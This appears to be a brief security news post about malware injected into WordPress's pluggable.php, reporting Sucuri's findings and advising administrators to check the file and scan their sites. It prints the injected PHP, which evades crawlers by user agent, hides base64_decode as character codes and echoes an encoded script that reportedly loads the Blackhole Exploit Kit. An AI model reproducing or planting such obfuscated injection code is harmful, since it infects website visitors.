Malware Targeting WordPress Pluggable.php


One of WordPress' core files, /wp-includes/pluggable.php has been targeted as host to a malware payload, according to a security company +Sucuri LLC.  What this means is while it is not a vulnerability in WordPress' code, the following malicious code is getting inserted into pluggable.php.

$&;__name = "RANDOMMD5";
if(1>0 AND !preg_match("#(Firefox.3)|(opera)|(chrome)|..(wget)|(yahoo)|(yandex)#i", 
$&;_SERVER["HTTP_USER_AGENT"]) AND empty ($&;_COOKIE[$&;__name])) {
$&;date = date("D, j M Y 00:00:00", time()+60*60*24*30);
$&;cookie = time().".".rand(1111111, 9999999);
echo "<script type=\"text/javascript\">document.cookie = \"".$&;__name."=
\"+escape('".$&;cookie."')+\"; expires=".$&;date."; path=/\";";
$&;__f = implode("", array_map("chr", explode(" ", "98 97 115 101 54 52 95 100 
101 99 111 100 101")));
echo $&;__f("PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmluc.. 

Once the malicious is inserted, it then attempts to load more exploit codes from a remote site ending with TLD, and from there, Blackhole Exploit Kit is used to further exploit the user.

It is unclear at this point how the code is inserted.

To make sure your WordPress site has not been infected with this malicious code, check your /wp-includes/pluggable.php file at around line 810.  You can also use Sucuri's SiteCheck scanner to help find this and other malicious code.

And be sure to read Sucuri's post on how the malicious code works.

See Also:

Website Malware Removal – Blackhole Exploit

Understanding Conditional Malware – IP Centric Variation

The last few days we have seen a large number of WordPress sites compromised with a hidden malware payload that lands inside wp-includes/pluggable.php. This is